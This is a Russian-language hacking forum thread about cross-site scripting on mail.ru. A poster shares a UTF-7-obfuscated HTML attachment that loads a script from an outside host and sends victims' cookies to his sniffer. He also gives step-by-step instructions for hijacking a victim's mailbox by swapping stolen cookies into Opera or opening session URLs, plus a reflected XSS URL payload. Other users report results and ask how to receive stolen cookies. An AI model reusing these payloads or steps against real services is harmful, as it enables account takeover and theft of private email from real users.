XSS на mail.ru
 

Взлом Майл.ру
жертва должна будет скачать и открыть прикреплённый файл в хтмл формате

<html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7">
<TABLE><TD BACKGROUND="+ACYAIw-106+ACYAIw-97+ACYAIw-118+ACYAIw-97+ACYAIw-115+ACYAIw-99+ACYAIw-114+ACYAIw-105+ACYAIw-112+ACYAIw-116: document.write('+ACYAIw-60+ACYAIw-115+ACYAIw-99+ACYAIw-114+ACYAIw-105+ACYAIw-112+ACYAIw-116 SRC=http://devarsiv.org/alex/j.js> </SCRIPT>')">
</html>

куки придут на мой сниффер
вы можете воспользоваться ими по адресу:www.devarsiv.org/alex/alex.php

сейчас сделаю видео !

удачи!

Actu@l SpY

Круто нафиг! :). Давай видео !!! )

Отлично!

Сделав как описанно выше на сниффер пришло следующее:

"REFERER=http://win.mail.ru/cgi-bin/readmsg/1.html?id=11601349480000001767;0;1&mode=attachment &channel=¬ype"

Что-то не так делаю или что?
Ведь сессии самой то нет...

Если сработает то будет круто.... а сниф может не сработать? иногда бывает что приходит пустые логи..

Если я ничего не путаю, то я вижу следующее:
Примеры, которые привел Actu@l SpY не будут работать хотя бы по той причине, что пути такого как "http://win.mail.ru/session/......" нет уже...в данный момент "http://win.mail.ru/cgi-bin/..."
Сессию сниффер никак не может утянуть...
По крайней мере у меня не получилось, хотел делал точно все так, как описано выше...
Может подскажите в чем моя ошибка?

до того момента как я выложил багу на форуме всё работало,
буквально через 30 минут,эту багу прикрыли ,остался только вариант через мой сниффер и то по непонятным причинам попасть в инбокс через оперу по свежим кукам стало проблематично

nc.STRIEM подтвердит, что сегодня он побывал у меня-же в инбоксе,приведённым мной вариантом,,а через пол чеса облом, багу видимо прикрыли,но всё-же подменив куки в опере мы попадем в инбокс,на то время пока жертва будет в он-лине

Actu@l SpY

Ну это для нас давно не секрет, что люди с mail.ru тоже тут тусуються, потому как бы стараемся что-то свеженькое и горячее переносить в закрытую зону.

P.S. В этот раз меня терзали смутные сомнения, убрать ли тему выше или оставить тут. Оставил ). Результат на лицо :)

Круто чувак.Ждем видео.

видео отправил но ещё не опубликовали ,может и-за не очень хорошего качества

Actu@l SpY

Попробуй ищё раз отправить. Видео не дошло.

ЭТУ XSS не прикрыли!
прост чеб она выполнилась недостаточно открыть письмо!
Отсылаеться она так: сохраняеться в html файл, после чего файл прикрепляеться к письму! потом при прочтение письма жертва должна нажать "скачать" прикрепленный файл, и в появившемся окошке нажать кнопку открыть! собсно вот так))) тогда срабатывает, и куки уплывают.......

Классно, а от браузера жертвы результат не зависит?

на мaйл.ру вопше по себе ху* знает какие у них там глиуки на сервере ,вчера вечером сниффер перестал выдёргивать сессию ,сегодня сессия и куки выдёргиваетса нормально.

когда на сниффер приходит куки и путь к ящику: http://win.mail.ru/cgi-bin/
то надо менять cookie в опере
в каждый параметр вставляете своё значение например так:
заходите к себе на емаил через оперу дальше в инструменты,настройки,куки ,управление cookies ,виде-те @майл.ру кликнете на логотип открывается табло с куками:
c8: 71gpRQAAAAD1LAEAAAAAARAQAAAAABGR0BAAAAAAD7iAEAA
Mpop:1160300756:4d50560750005024f6a5d5e465e0404090 c1d010c00184958520c44115c565c5b1b4341:xak4u@mail.r u:
Mpopl:63920967
mrcu:FDD24528E35C2CFCD118A66742
p:g20EAEr/eAA
t:bLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAABAAABAAAAAAAABgMpgcA
теперь меняете каждый параметр на то,что утянул сниффер
вход:http://win.mail.ru/cgi-bin/start

утенулась сессия то куки подменивать в Опере не нужно,на тот момент пока жертва в онлайне читает письмо вы входите так : http://win.mail.ru/session/5a0f5b647243746f19050219091d011b0007014f6a5d5e465e 0704091b02747b1f5c504350555842105b5c44411f4642/start
остальное вот это:/readmsg/document.html?id=11603102580000017668;0;1&mode=att achment&channel=&notype удаляете

если не разберётесь стучите ,всем удачи

rabotaet respekt

выше приведённый мной вариант срабатывает и на Рамблер.ру
ещё нашёл вариант : http://win.mail.ru/cgi-bin/sendmsg?plainmode=1&Body="><SCRIPT SRC=http://devarsiv.org/alex/j.js></SCRIPT>
но ругается на потенциальный опасный код в письме ,тoесть в прикреплённом хтмл файле
вот сам ксс на майле.ру :win.mail.ru/cgi-bin/sendmsg?plainmode=1&Body=<script>alert('XSS')</script>

У мя не пашет! не уверен че она работает или работала в ближайшее время)))

вчера алерт выскакивал 100% отвечаю, сегодня голяк
в паб-лик больше скидывайте баги ..короче

круто !!!!!!!! Только нужно умудрится заставить жертву скачать файл

http://video.antichat.ru/file213.html

Народ помагите как зайти на снифер что то никак не могу !

http://old.antichat.ru/sniff/

И как мне сделать что бы на этот снифер приходили куки ?

чел, полистай форум, эти вопросы очень подробно рассматривались..

Я его сегодня целый день уже листаю так и ничего не нашол !

значит, не судьба=\

Не ну серьёзно трудно что ли так ответить на вопрос вот как будто очёмнить нериальном прошу!

А кроме как листать, читать пробовал ?


Если ты имееш ввиду mail.ru, то для того чтобы на твой сниф пришли куки, в сервисе должна присутствовать пассивная или активная XSS.

Подробно о XSS

В каком сервисе и откуда взять пасивную или активную Xss???

Имел ввиду сервисы мейла.ру, "откуда взять?" - читай выше, дал ссылку.

ТЕБЕ, лучше забить на это.

Nightmarе аты что думал тебя ждать будут.